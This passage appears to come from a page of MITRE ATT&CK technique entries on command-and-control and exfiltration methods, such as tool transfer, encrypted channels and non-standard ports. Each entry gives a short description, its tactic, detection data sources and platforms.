Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre